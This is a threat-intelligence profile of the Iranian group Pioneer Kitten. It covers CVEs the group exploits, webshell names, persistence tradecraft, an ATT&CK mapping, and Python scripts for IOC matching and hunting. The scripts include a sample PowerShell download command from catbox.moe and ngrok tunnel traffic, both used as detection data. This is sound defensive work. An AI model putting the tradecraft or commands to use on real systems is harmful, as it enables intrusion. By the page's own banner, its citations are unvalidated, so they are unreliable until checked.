This page is an imported deep-research artifact. Treat it as lead-generation material until claims, citations, URLs, hashes, and detection logic are validated against primary public sources and repository evidence standards.
Pioneer Kitten (Fox Kitten, Lemon Sandstorm, UNC757) – Actor Deep Research
Executive Summary
Pioneer Kitten is an Iranian state-sponsored cyber actor (aliases: Fox Kitten, Lemon Sandstorm, UNC757, Parisite, Rubidium, etc.) active since at least 2017【6†L91-L99】. U.S. agencies (FBI/CISA) report the group exploits internet-facing appliances (Citrix Netscaler, F5 BIG-IP, Pulse/Ivanti VPNs, Palo Alto Pan-OS, Check Point, Fortinet VPNs, etc.) to gain initial access【7†L197-L205】【37†L622-L631】. In recent years (2023–24) they have operated as an “initial-access broker,” selling or directly providing that access to ransomware affiliates (e.g. ALPHV/BlackCat, NoEscape, RansomHouse) in exchange for a cut of ransom payments【6†L109-L117】【17†L332-L340】. The group also conducts espionage for Iranian intelligence: for example, FBI/CISA note they stole sensitive data from networks in Israel and Azerbaijan【4†L41-L45】 and assess that the earlier hack-and-leak campaign Pay2Key (late 2020) was aimed at Israeli targets【7†L147-L150】.
Pioneer Kitten’s TTPs include scanning (via Shodan) for vulnerable VPN/appliance CVEs (Citrix CVE-2019-19781, 2023-3519; F5 CVE-2022-1388, 2020-5902; Ivanti CVE-2024-21887; Palo Alto CVE-2024-3400; Check Point CVE-2024-24919; Fortinet CVE-2018-13379; etc.)【7†L197-L205】【37†L622-L631】. They drop webshells (e.g. on Citrix Netscaler) and backdoors (e.g. version.dll)【41†L239-L248】, create hidden admin accounts (e.g. “sqladmin$”, “IIS_Admin”, “John McCain”)【11†L272-L281】, install scheduled tasks (e.g. SpaceAgentTaskMgrSHR DLL sideload)【41†L239-L248】, and deploy tools like MeshCentral and AnyDesk for persistent access【41†L247-L255】【42†L298-L302】. Detection should focus on patching and monitoring the listed appliances and on indicators of compromise: unusual filesystem changes (new directories or webshell files on Netscaler or VPN gateways), creation of suspicious Windows accounts or scheduled tasks, use of remote-access tools (AnyDesk, Ligolo, NGROK), and anomalous PowerShell/RDP activity【11†L272-L281】【42†L281-L290】. No specific Israeli incident beyond Pay2Key has been publicly detailed since 2020, but CISA explicitly names “organizations in Israel” as targets of Pioneer Kitten espionage【4†L41-L45】; defenses should therefore include Israeli-critical networks.
Actor Identity
Primary name: Pioneer Kitten (CrowdStrike)【6†L91-L99】. Aliases: Fox Kitten (ClearSky/FortiGuard)【37†L539-L547】, UNC757 (Microsoft), Parisite (Dragos), Rubidium (Microsoft), Lemon Sandstorm (Microsoft/Google)【6†L91-L99】【33†L67-L72】, also self-styled Br0k3r or xplfinder in underground forums【6†L95-L99】【33†L69-L72】. The group has sometimes been referred to as “TunnelMaster” in older reports. All sources agree this is a single Iranian-nexus cluster; no conflicting attributions were found. Different vendors use different tags (e.g. CrowdStrike calls it PIONEER KITTEN, ClearSky/FortiGuard use Fox Kitten, Microsoft/Google use Lemon Sandstorm), but all refer to the same actor. In MITRE ATT&CK the cluster corresponds to G0117 (Fox Kitten)【36†L1-L9】. No public persona or front company beyond the cover name Danesh Novin Sahand (an Iranian IT firm ID) has been confirmed for this group【7†L168-L170】.
Sponsor and Command Relationship
State Sponsor: All evidence indicates an Iranian state backing. FBI/CISA explicitly assess the group’s activity is “consistent with a cyber actor with Iranian state-sponsorship”【6†L98-L100】, and a U.S. advisory states the actors conduct espionage “in support of the Government of Iran (GOI)”【7†L151-L159】. The group’s targets (US defense, Israeli, Azerbaijan networks) align with Iranian strategic interests, reinforcing this assessment. Pioneer Kitten’s ransomware-enabling operations are likely not formally sanctioned by Tehran (the advisory notes they hide their location and express concern over government cryptocurrency monitoring), but their espionage (data theft) clearly serves GOI objectives【7†L151-L159】【42†L304-L313】. There is no indication the group is a proxy of another state; all sources tie it to Iran. No publicly known individual leader or cutout is identified; the actors operate as a team (“Pioneer Kitten/Fox Kitten”) and have self-labeled contracts in cybercrime forums.
Israeli/Israel-Adjacent Relevance
CISA and FBI explicitly list Israel among countries targeted by Pioneer Kitten’s intrusions【4†L37-L45】. They note Iranian actors stole “sensitive technical data” from Israeli organizations【4†L41-L45】. An earlier campaign, Pay2Key (late 2020), saw this group compromise Israeli hospitals and healthcare entities; U.S. authorities now assess Pay2Key was a political information operation undermining Israeli cyber security【7†L147-L150】. Fortinet incident response also linked Pioneer Kitten (Fox Kitten) to attacks on “Middle East critical national infrastructure” in 2023–2025【37†L525-L533】 (region likely including Israel). Sector scope: education, healthcare, government, financial, defense, telecom/critical infrastructure【4†L33-L45】【37†L517-L523】. Confidence: High for general targeting of Israel and MENA (multiple official sources). Gap: Beyond Pay2Key (2020) and broad advisory mentions, no specific Israeli compromise by Pioneer Kitten after 2020 has been published. A detection gap exists in Israeli CTI: defense agencies should verify local logs for signs of the listed TTPs (e.g. webshells, unusual creds).
Targeting & Intrusion Lifecycle
Pioneer Kitten follows a scan→exploit→persistence→escalation→lateral→C2/exfiltrate chain:
- Reconnaissance: Uses Shodan and Google dorks to enumerate internet-facing appliances with known CVEs【11†L221-L229】【42†L318-L322】.
- Initial Access: Exploits unpatched vulnerabilities in network devices【42†L318-L322】【7†L197-L205】. Known exploited CVEs include Citrix Netscaler (CVE-2019-19781, CVE-2023-3519)【42†L318-L322】, F5 BIG-IP (CVE-2022-1388, CVE-2020-5902)【42†L318-L322】【31†L210-L217】, Pulse Secure/Ivanti VPN (CVE-2019-11510, CVE-2019-11539, CVE-2024-21887)【11†L238-L242】【37†L622-L631】, Palo Alto PAN-OS (CVE-2024-3400)【11†L238-L242】, Check Point Gateway (CVE-2024-24919)【7†L186-L194】【11†L238-L242】, and Fortinet FortiOS VPN (CVE-2018-13379)【37†L622-L631】. These exploits give initial shell or admin access on the appliance.
- Persistence: After exploitation, they deploy webshells and backdoors. On Citrix Netscaler/ADC, they create directories (e.g. /var/vpn/themes/imgs/, /xui/common/images/) and install files like netscaler.1, netscaler.php, ctxHeaderLogon.php, and additional shells under /netscaler/logon/LogonPoint/...【11†L248-L257】【41†L239-L248】. They drop a malicious version.dll backdoor in C:\Windows\ADFS\【41†L247-L250】. They also create scheduled tasks for persistence: e.g. a task SpaceAgentTaskMgrSHR (DLL sideloading via contig.exe/dllhost.ext)【41†L239-L247】, plus daily Windows service tasks with random names loading corresponding .sys DLLs【41†L252-L259】. They install remote management tools (MeshCentral)【41†L247-L255】 for maintenance.
- Privilege Escalation: They create local accounts on internal hosts, using innocuous names (e.g. sqladmin$, IIS_Admin, John McCain)【11†L272-L281】. Stolen credentials from the network devices are reused to log in to Citrix XenDesktop or as domain admins【41†L260-L266】. These valid accounts are used to elevate privileges undetected.
- Defense Evasion: They request exemptions in zero-trust/AV policies【41†L235-L239】, use admin creds to disable antivirus and weaken PowerShell execution policies【41†L267-L272】, and attempt to have their malware signed or allowlisted【41†L269-L272】.
- Discovery: Once inside, they harvest environment info: exporting Windows registry hives and firewall configs【42†L289-L293】, and exfiltrating user account lists and config files from domain controllers【42†L290-L296】 to map the network. They may also run internal scans (using Nmap, Angry IP Scanner) as listed by Fortinet【37†L581-L590】.
- Lateral Movement: Uses Windows RDP/PowerShell: a compromised admin session is used to run PowerShell ISE and Invoke-WebRequest (observed pulling from files.catbox.moe)【42†L281-L289】, or to enable PowerShell Web Access on servers【42†L298-L302】. They also use stolen creds to RDP into other systems (potentially the domain controller)【42†L281-L289】【41†L260-L266】.
- C2 (Command & Control): Deploys legitimate remote-access tools as backup channels: AnyDesk is installed for persistent access【42†L298-L301】, and tunneling tools like Ligolo or NGROK are used for outbound tunnels【42†L299-L303】. (Fortinet also notes use of proxies like Chisel, FRPC, nginx proxies, ngrok)【37†L581-L590】.
- Exfiltration & Impact: After establishing backdoors, Pioneer Kitten either sells the access or hands it off to ransomware crews. They collaborate with affiliates (ALPHV/BlackCat, NoEscape, RansomHouse) to encrypt victim networks and share ransoms【6†L109-L117】【42†L304-L312】. Separately, they steal and exfiltrate sensitive data (e.g. from Israeli targets) as espionage for the GOI【4†L41-L45】【42†L304-L313】. The actor is careful to obscure Iranian origin when dealing with affiliates (Intel says they never reveal their national identity)【6†L119-L122】.
ATT&CK Mapping
| Technique ID | Name | Tactic | Observable Indicator | Source (quote) | Evidence Label | Quality (M) |
|---|---|---|---|---|---|---|
| T1596 | Search Open Technical Databases | Reconnaissance | Shodan queries to find devices vulnerable to known CVEs【42†L318-L322】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1190 | Exploit Public-Facing Application | Initial Access | Exploitation of Citrix, F5, Ivanti/Pulse, Palo Alto, CheckPoint CVEs【42†L318-L322】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1133 | External Remote Services | Initial Access | Creation of /xui/common/images/ dir on devices (Citrix)【41†L230-L238】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1505.003 | Server Software Component: Web Shell | Persistence | Webshell files (netscaler.1, netscaler.php, ctxHeaderLogon.php) on Netscaler【11†L248-L257】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1136.001 | Create Account: Local Account | Persistence | New Windows accounts named “sqladmin$”, “IIS_Admin”, etc.【11†L272-L281】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1098 | Account Manipulation | Persistence | Requests for exemptions in zero-trust/security policies【41†L235-L239】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1053.005 | Scheduled Task/Job: Scheduled Task | Persistence | Task SpaceAgentTaskMgrSHR (DLL sideload contig.exe)【41†L239-L247】; daily tasks loading random DLLs【41†L252-L259】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1505 | Server Software Component: Windows Service | Persistence | Creation of random Windows service in C:\Windows\system32\drivers\*.sys【41†L252-L259】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1078.003 | Valid Accounts: Local Accounts | Privilege Escalation | Re-use of compromised device creds (e.g. Citrix admin) to log into other apps【41†L260-L266】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1078.002 | Valid Accounts: Domain Accounts | Privilege Escalation | Use of stolen network-admin creds to access domain controllers【41†L260-L266】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1562.001 | Impair Defenses: Disable Security Tools | Defense Evasion | Admin creds used to disable AV/endpoint defenses【41†L267-L272】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1562.010 | Impair Defenses: Modify System Firewall | Defense Evasion | Lowering Windows PowerShell policies, security exemptions【41†L267-L272】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1012 | Query Registry | Discovery | Exporting registry hives from compromised servers【42†L289-L293】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1482 | Domain Trust Discovery | Discovery | Exfiltration of user lists/logs from domain controller【42†L290-L296】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1219 | Remote Access Software | C2 | Installation of AnyDesk remote-access software【42†L298-L302】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1059.001 | Command and Scripting Interpreter: PowerShell | C2 | Use of PowerShell ISE to run Invoke-WebRequest from catbox[.]moe【42†L281-L288】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1572 | Protocol Tunneling | C2 | Outbound connections via ligolo or ngrok (e.g. ngrok[.]io subdomain)【42†L298-L303】 | FBI/CISA (advisory) | Source-reported | M1 |
| T1021.002 | Remote Desktop Protocol (RDP) | Lateral Movement | Use of remote desktop session from compromised account【42†L281-L288】 | FBI/CISA (advisory) | Source-reported | M1 |
| – | Ransomware Collaboration | Impact | Collaboration with BlackCat/NoEscape affiliates, data encryption【6†L109-L117】【42†L304-L312】 | FBI/CISA (advisory) | Source-reported | M1 |
| – | Data Theft for GOI | Impact | Exfiltration of sensitive data to support Iranian intelligence【4†L41-L45】【42†L310-L313】 | FBI/CISA (advisory) | Source-reported | M1 |
Mapping quality: All mappings above are directly supported by FBI/CISA reporting (M1: directly described in source). Sources are official advisories or reputable vendor reports.
Associated Tools and Malware
Remote-Access/C2: AnyDesk (remote admin)【42†L298-L302】; MeshCentral (RMM)【41†L247-L255】; Ligolo-ng, ngrok (tunneling)【42†L299-L303】; PowerShell Web Access (enabled on servers)【42†L298-L302】.
Webshells/backdoors: ChinaChopper (common webshell)【37†L581-L590】; custom .php webshells on Netscaler (netscaler.php, ctxHeaderLogon.php)【11†L248-L257】; Tiny web shell and version.dll backdoor【41†L247-L250】.
PrivEsc/Persistence: JuicyPotato (Windows token abuse)【37†L591-L600】; STSRCheck (service trojan)【37†L604-L613】; service creation (.sys) scripts.
Tools for scanning/exploitation: Nmap, Angry IP Scanner (network discovery)【37†L581-L590】; Chisel, FRPC, GoProxy (proxy/tunnel tools)【37†L581-L590】; CredInterceptor (credential dumper)【37†L581-L590】.
Misc: 7-Zip (archiving, noted on variant hunts)【37†L581-L590】; WinRAR (backup compression)【37†L581-L590】; Invoke-TheHash (Piggyback/Pass-the-Hash)【37†L591-L600】; Plink/PuTTY (SSH tunneling)【37†L601-L609】.
Ransomware affiliates: The group works with ALPHV/BlackCat, NoEscape, and RansomHouse (AKAs)【6†L109-L117】【17†L332-L340】, but those are separate criminal families, not direct toolkits of Pioneer Kitten.
Confidence: All listed tools are documented by sources (primarily Fortinet【37†L581-L590】 and FBI/CISA【41†L247-L255】【42†L298-L303】). Detection note: e.g. AnyDesk and ligolo/ngrok produce distinctive network/integration logs. Persistence tools like STSRCheck, JuicyPotato can be identified by known signatures. Handling: treat these as post-exploitation indicators for incident response and label accordingly (e.g. AnyDesk installations).
Public IOCs
CISA’s AA24-241A advisory provides a publicly downloadable IOC dataset (STIX) for Pioneer Kitten activity【6†L81-L84】. Example artifacts from the advisory include:
- Webshell filenames: netscaler.1, netscaler.php, ctxHeaderLogon.php, version.dll (backdoor)【11†L248-L257】【41†L247-L250】.
- Compromised account names: e.g. sqladmin$, IIS_Admin, John McCain【11†L272-L281】.
- Malicious tasks: e.g. scheduled task named SpaceAgentTaskMgrSHR (with payload version.dll)【41†L239-L247】.
- Domains: files.catbox[.]moe (actor hosting site, seen in PowerShell traffic)【42†L281-L288】; connections to *.ngrok[.]io for C2【42†L299-L303】.
- CVE references: the exploited CVE numbers above are themselves shared indicators of potentially compromised systems.
All specific IOCs are as published by sources. Refer defenders to CISA’s advisory for the full STIX IOC feed【6†L81-L84】.
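As an added example (not code from the advisory, CISA, or any source on this page), the following Python turns indicator objects from a STIX 2.1 bundle of the shape CISA publishes into lookup sets and checks observed file names, domains and account logins against them. The bundle, its ids and the observations are constructed here from the artifact names quoted above; the pattern parser assumes simple `=` comparisons and flattens compound (AND/OR) patterns, which is fine for triage but over-matches for alerting.

```python
"""Turn indicator objects from a STIX 2.1 bundle into lookup sets and check
observed artifacts against them. Added example; the bundle is constructed and
is not CISA's AA24-241A feed."""
import json
import re

# Constructed bundle in the shape of a STIX 2.1 export. Only the artifact names
# quoted on this page appear; the ids are placeholders.
SAMPLE_BUNDLE = json.dumps({
    "type": "bundle",
    "id": "bundle--00000000-0000-4000-8000-000000000001",
    "objects": [
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000002",
         "pattern_type": "stix",
         "pattern": "[file:name = 'netscaler.php'] OR [file:name = 'ctxHeaderLogon.php']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000003",
         "pattern_type": "stix",
         "pattern": "[file:name = 'version.dll' AND file:parent_directory_ref.path = 'C:\\\\Windows\\\\ADFS']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000004",
         "pattern_type": "stix", "pattern": "[domain-name:value = 'files.catbox.moe']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000005",
         "pattern_type": "stix", "pattern": "[user-account:account_login = 'IIS_Admin']"},
        {"type": "indicator", "id": "indicator--00000000-0000-4000-8000-000000000006",
         "pattern_type": "snort", "pattern": "alert tcp any any -> any 443 (msg:\"placeholder\";)"},
        {"type": "threat-actor", "id": "threat-actor--00000000-0000-4000-8000-000000000007",
         "name": "Pioneer Kitten"},
    ],
})

# One comparison inside a STIX pattern: <object-type>:<property> = '<value>'.
# Only the '=' operator is handled; MATCHES/LIKE/!= comparisons are ignored.
COMPARISON = re.compile(r"([\w-]+:[\w.\-]+)\s*=\s*'((?:[^'\\]|\\.)*)'")


def stix_unescape(value):
    # STIX string literals escape backslash and single quote with a backslash.
    return re.sub(r"\\(.)", r"\1", value)


def refang(value):
    # Accept defanged notation such as files.catbox[.]moe or hxxp://.
    return value.replace("[.]", ".").replace("hxxp", "http")


def extract_iocs(bundle_json):
    """Return {object path: set of values} for every 'stix' pattern_type indicator.
    Compound patterns are flattened: each comparison becomes its own lookup value,
    so an AND pattern over-matches; acceptable for triage, not for alerting."""
    bundle = json.loads(bundle_json)
    iocs = {}
    for obj in bundle.get("objects", []):
        # STIX 2.0 indicators have no pattern_type; treat a missing one as 'stix'.
        if obj.get("type") != "indicator" or obj.get("pattern_type", "stix") != "stix":
            continue
        for path, raw in COMPARISON.findall(obj["pattern"]):
            iocs.setdefault(path, set()).add(stix_unescape(raw))
    return iocs


def match_observations(iocs, observations):
    """observations: iterable of (object path, observed value); returns the hits."""
    hits = []
    for path, observed in observations:
        candidates = iocs.get(path, set())
        value = refang(observed)
        if path.startswith("domain-name") or path.startswith("url"):
            # DNS names are case-insensitive; file names on Netscaler (FreeBSD) are not.
            value = value.lower()
            candidates = {c.lower() for c in candidates}
        if value in candidates:
            hits.append((path, value))
    return hits


if __name__ == "__main__":
    iocs = extract_iocs(SAMPLE_BUNDLE)
    # Constructed observations, e.g. from a Netscaler directory listing and DNS logs.
    seen = [("file:name", "netscaler.php"), ("file:name", "index.html"),
            ("domain-name:value", "files.catbox[.]moe"),
            ("user-account:account_login", "IIS_Admin")]
    for hit in match_observations(iocs, seen):
        print("IOC hit:", hit)
```

The bundle skips non-STIX pattern types (a Snort rule is not a lookup value) and non-indicator objects, so the same function can be pointed at a full advisory export; the refang step matters because advisories and tickets usually carry domains in the defanged `[.]` form shown on this page.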
Detection and Hunting Hypotheses
- Unauthorised Appliance Access: Monitor logs on Citrix, F5, Ivanti/Pulse, Palo Alto, Check Point and Fortinet VPN devices for exploit attempts. Telemetry: appliance syslogs, NIDS. Observable: creation of unexpected directories or files (e.g. /xui/common/images on Citrix)【41†L230-L238】; exploit signatures for CVE-2019-19781, CVE-2023-3519, CVE-2022-1388, CVE-2024-21887, CVE-2024-3400, CVE-2024-24919【7†L197-L205】【42†L318-L322】. Lookback: 3–6 months. False positives: routine admin scans – verify intent. Escalation: confirmed exploit or new webshell presence. (ATT&CK: T1190, T1133).
- New or Anomalous Accounts: Search Windows event logs for creation of service accounts with the specific names seen (“sqladmin$”, “IIS_Admin”, “John McCain”, etc.)【11†L272-L281】. Fields: EventID 4720/4726 (New account) with those exact usernames. Lookback: 6 months. False positives: legitimate admin names (review change requests). Escalation: any match, especially if combined with other lateral movement. (ATT&CK: T1136.001).
- Suspicious Scheduled Tasks/Services: Audit Task Scheduler for unusual tasks: e.g. “SpaceAgentTaskMgrSHR” or daily tasks with random names loading unknown DLLs【41†L239-L259】. Use Sysmon or endpoint logs for new service creation in C:\Windows\system32\drivers\*.sys. Telemetry: Windows Event 4698/4700 (task created); 7045 (service installation). Lookback: 90 days. False positives: maintenance tasks (verify naming). Escalation: task/service referencing version.dll or side-loading contig.exe/dllhost. (ATT&CK: T1053, T1505).
- Webshell Detection: On Citrix/ADC appliances (or any exposed appliance), monitor file system or URL paths for known webshell indicators (the file names above)【11†L248-L257】【41†L230-L238】. Telemetry: file integrity monitoring or manual inspection. Lookback: since vendor patches (post-07/2023). False positives: misconfigurations on development netscalers (verify). Escalation: presence of any netscaler webshell, especially after patching. (ATT&CK: T1505.003).
- Anomalous Credential Use: Look for logins to sensitive systems (domain controllers, Citrix director, AD) using credentials from devices. Telemetry: network authentication logs. Observable: a Citrix/ADC admin user appearing on DC (or vice versa)【41†L260-L266】. False positives: multi-role admins – correlate with IP addresses. Escalation: unexpected credential pairings. (ATT&CK: T1078).
- Suspicious Admin Sessions (PowerShell/RDP): Detect RDP sessions from unusual hosts or the enabling of PowerShell Web Access【42†L298-L302】. Telemetry: Windows logs (RDP logon, TerminalServices-RemoteConnectionManager). Observable: PowerShell ISE being launched via RDP to run scripts (as seen with Invoke-WebRequest to catbox.moe)【42†L281-L288】. Fields: process creation events for PowerShell ISE or contig.exe with unusual parameters. Lookback: 30 days. False positives: legitimate admin use of PS ISE (rare). Escalation: any Invoke-WebRequest with external URLs (e.g. *.catbox.moe). (ATT&CK: T1059.001).
- Network Tunnel Traffic: Monitor DNS and firewall logs for tunneling tools: outbound connections to *.ngrok[.]io, *.ligolo, or unusual UDP/TCP flows by tools like AnyDesk (TCP 7070–7071, UDP 7072)【42†L298-L303】. Telemetry: proxy logs, DNS queries. False positives: known use of such tools (e.g. developer VPN). Escalation: any unexpected ngrok or AnyDesk session. (ATT&CK: T1219, T1572).
- VPN/Network Scanning: Hunt for internal scanning: internal hosts running Nmap/AngryIP (process creation events) against the local network. Fields: Sysmon process creation for nmap.exe, angryip.exe, glider, chisel, etc.【37†L581-L590】. False positives: pentests (coordinate). Escalation: escalate if combined with exploit logs. (ATT&CK: T1596).
- Lateral SMB/SMBExec Activity: Monitor use of known lateral tools (PsExec, SMB Exec) that might reuse network creds; unusual inter-host RPC sessions post-compromise. (ATT&CK: T1021, T1078).
Each hypothesis ties to ATT&CK techniques and observable signals from the above analysis. False positives should be assessed in context (e.g. legitimate admin tasks).
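The account, scheduled-task, PowerShell and DNS hypotheses above, applied to constructed telemetry as an added example (this is not code from the advisory or from any vendor tool named on this page): Windows events 4720, 4698 and 4104 in a flattened SIEM-export shape, plus BIND-style DNS query-log lines. The host names, the `.corp.example` internal suffix, the log formats and the sample records are all assumptions made for the example.

```python
"""Hunting checks for the Pioneer Kitten hypotheses on this page, run over
constructed sample telemetry. Added example; not from the CISA advisory."""
import re

# Account names, task name and payload names quoted on this page from FBI/CISA reporting.
SUSPECT_ACCOUNTS = {"sqladmin$", "iis_admin", "john mccain"}
SUSPECT_TASK = "spaceagenttaskmgrshr"
SUSPECT_TASK_PAYLOADS = ("version.dll", "contig.exe", "dllhost")
WATCHED_DOMAINS = ("catbox.moe", "ngrok.io")
INTERNAL_SUFFIX = ".corp.example"  # assumed internal DNS suffix for this example

# Constructed Windows events in the flattened shape a SIEM export would give.
SAMPLE_EVENTS = [
    {"EventID": 4720, "Computer": "dc01.corp.example",
     "TargetUserName": "IIS_Admin", "SubjectUserName": "svc_backup"},
    {"EventID": 4720, "Computer": "dc01.corp.example",
     "TargetUserName": "jdoe", "SubjectUserName": "helpdesk1"},
    {"EventID": 4698, "Computer": "adfs01.corp.example",
     "TaskName": "\\SpaceAgentTaskMgrSHR",
     "TaskContent": "<Exec><Command>C:\\Windows\\ADFS\\contig.exe</Command></Exec>"},
    {"EventID": 4698, "Computer": "app02.corp.example",
     "TaskName": "\\Microsoft\\Windows\\Defrag\\ScheduledDefrag",
     "TaskContent": "<Exec><Command>%windir%\\system32\\defrag.exe</Command></Exec>"},
    # 4104 (script block logging) captures what ran inside PowerShell ISE; a 4688
    # process-creation event for powershell_ise.exe would not show the script body.
    {"EventID": 4104, "Computer": "app02.corp.example",
     "ScriptBlockText": "Invoke-WebRequest -Uri https://files.catbox.moe/abcd.zip -OutFile C:\\Temp\\a.zip"},
    {"EventID": 4104, "Computer": "app02.corp.example",
     "ScriptBlockText": "Invoke-WebRequest -Uri http://wsus01.corp.example/selfupdate"},
]
# Constructed DNS resolver log lines (BIND-style query log).
SAMPLE_DNS = [
    "28-Aug-2024 10:15:02.113 client 10.0.4.17#51234: query: a1b2c3d4.ngrok.io IN A +",
    "28-Aug-2024 10:15:03.500 client 10.0.4.18#51235: query: www.microsoft.com IN A +",
]

URL_HOST = re.compile(r"https?://([^\s/'\"]+)", re.IGNORECASE)
DNS_QUERY = re.compile(r"client (\S+?)#\d+: query: (\S+) IN")


def _finding(hyp, attack, host, detail):
    return {"hypothesis": hyp, "attack": attack, "host": host, "detail": detail}


def check_event(ev):
    """Apply the account, scheduled-task and PowerShell hypotheses to one event."""
    eid = ev.get("EventID")
    host = ev.get("Computer", "?")
    if eid == 4720 and ev.get("TargetUserName", "").lower() in SUSPECT_ACCOUNTS:
        return _finding("new-or-anomalous-account", "T1136.001", host,
                        f"account {ev['TargetUserName']} created by {ev.get('SubjectUserName')}")
    if eid == 4698:
        name = ev.get("TaskName", "").lower()
        content = ev.get("TaskContent", "").lower()
        if SUSPECT_TASK in name or any(p in content for p in SUSPECT_TASK_PAYLOADS):
            return _finding("suspicious-scheduled-task", "T1053.005", host,
                            f"task {ev['TaskName']} references {ev['TaskContent']}")
    if eid == 4104:
        text = ev.get("ScriptBlockText", "")
        if re.search(r"\b(Invoke-WebRequest|iwr)\b", text, re.IGNORECASE):
            # The page escalates on any external URL; internal WSUS/file servers are not flagged.
            for url_host in URL_HOST.findall(text):
                h = url_host.lower()
                if not h.endswith(INTERNAL_SUFFIX):
                    return _finding("suspicious-admin-session", "T1059.001", host,
                                    f"Invoke-WebRequest to external host {h}")
    return None


def check_dns_line(line):
    """Flag queries for names under the tunnelling-service domains listed on this page."""
    m = DNS_QUERY.search(line)
    if not m:
        return None
    client, qname = m.group(1), m.group(2).lower().rstrip(".")
    if any(qname == d or qname.endswith("." + d) for d in WATCHED_DOMAINS):
        return _finding("network-tunnel-traffic", "T1572", client, f"DNS query for {qname}")
    return None


def hunt(events, dns_lines):
    """Run every check and return the list of findings, each tagged with its ATT&CK ID."""
    findings = [f for f in map(check_event, events) if f]
    findings += [f for f in map(check_dns_line, dns_lines) if f]
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS, SAMPLE_DNS):
        print(f"[{f['attack']}] {f['hypothesis']} on {f['host']}: {f['detail']}")
```

Each finding carries the ATT&CK ID from the hypothesis list so it can be filed against the mapping table above; the false-positive handling the page calls for (change requests for account names, known developer tunnels) belongs in an allowlist applied after `hunt`, not inside the checks.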
Source Register (selection)
(For reference; see text for citation details)
- FBI/CISA Joint Cybersecurity Advisory AA24-241A “Iran-based Cyber Actors Enabling Ransomware Attacks on US Organizations,” 28 Aug 2024【4†L27-L34】【42†L304-L313】 (Publisher: US FBI/CISA; Reliability: A; Provides detailed TTPs and asserts GOI support; no superseding).
- CISA Cybersecurity Advisory AA23-201A “Threat Actors Exploiting Citrix CVE-2023-3519” 20 Jul 2023【25†L68-L72】 (Gov of Canada summary; reliability: A; discusses Citrix exploit leading to AD data theft; original CISA reference).
- HHS/HC3 Analyst Note “Threat Actors Exploiting F5 CVE-2022-1388” 8 Oct 2024【31†L210-L217】【31†L219-L228】 (US HHS; reliability: A; notes Pioneer Kitten exploitation of F5 BIG-IP and access brokerage).
- Fortinet FortiGuard Threat Actor Profile “Fox Kitten” 14 May 2026【37†L517-L523】【37†L525-L533】 (Fortinet blog; reliability: A; includes IR details of Middle East intrusion and aliases/CVEs).
- Picus Security blog “Pioneer Kitten…” 19 Sep 2024【11†L198-L206】【11†L272-L281】 (vendor analysis; reliability: B; restates advisory findings on TTPs).
- TechTarget Computer Weekly “Iranian APT caught acting as access broker…” 29 Aug 2024【17†L300-L308】【17†L332-L340】 (press summary; reliability: B; quotes CISA advisory on ransomware affiliate collaboration).
- The Stack “Iranian APT … scanning for Check Point CVE…” 28 Aug 2024【33†L36-L45】【33†L67-L72】 (news site; reliability: B; summarizes FBI/CISA advisory on scanning and aliases).
- Canadian Cyber Centre Alert AL23-009 21 Jul 2023【25†L68-L72】 (Canadian govt; reliability: A; references CISA Citrix advisory).
Evidence Register (sample claims)
| Claim | Source | Evidence | Label | Reliability | Confidence | Notes |
|---|---|---|---|---|---|---|
| Pioneer Kitten aliases include Fox Kitten, UNC757, Parisite, Rubidium, Lemon Sandstorm | FBI/CISA AA24-241A【6†L91-L99】 / The Stack【33†L67-L72】 | “This group is known in the private sector by the names Pioneer Kitten, Fox Kitten, UNC757, Parisite, RUBIDIUM, and Lemon Sandstorm” | Source-reported | A | High | |
| Activity consistent with Iranian state sponsorship | FBI/CISA AA24-241A【6†L98-L100】 / HHS HC3【31†L219-L228】 | “the group’s activity is consistent with a cyber actor with Iranian state-sponsorship”【6†L98-L100】; “suspected nexus to the Iranian government”【31†L219-L228】 | Source-reported | A | High | |
| Exploits various appliance CVEs (Citrix, F5, etc.) | FBI/CISA AA24-241A【42†L318-L322】 / Fortinet【37†L622-L631】 | “initial access is usually obtained via exploiting … Citrix (CVE-2019-19781, CVE-2023-3519), F5 BIG-IP (CVE-2022-1388), Pulse Secure (CVE-2024-21887), PanOS (CVE-2024-3400)”【42†L318-L322】; also Fortinet list【37†L622-L631】. | Source-reported | A | High | |
| Collaborates with ransomware affiliates (ALPHV, NoEscape, RansomHouse) | FBI/CISA AA24-241A【6†L109-L117】【42†L304-L313】 | “These actors have collaborated with the ransomware affiliates NoEscape, RansomHouse, and ALPHV (aka BlackCat)”【6†L109-L117】; “actors collaborate with ransomware affiliates”【42†L304-L312】. | Source-reported | A | High | |
| Steals sensitive data from Israeli networks (espionage) | FBI/CISA AA24-241A【4†L41-L45】【42†L310-L313】 | “intrusions enabling the theft of sensitive technical data against organizations in Israel”【4†L41-L45】; exfiltration for GOI【42†L310-L313】. | Source-reported | A | High | |
| Targets include Israeli organizations (e.g. Pay2Key) | FBI/CISA AA24-241A【4†L41-L45】【7†L147-L150】 | “organizations in Israel”【4†L41-L45】; “Pay2Key was… aimed at undermining … Israel-based cyber infrastructure”【7†L147-L150】. | Source-reported | A | High | |
| Use of Shodan to find vulnerable devices | FBI/CISA AA24-241A【42†L318-L322】 | “Iranian cyber actors use Shodan[…] to identify Internet infrastructure hosting devices vulnerable to particular CVEs”【42†L318-L322】. | Source-reported | A | High | |
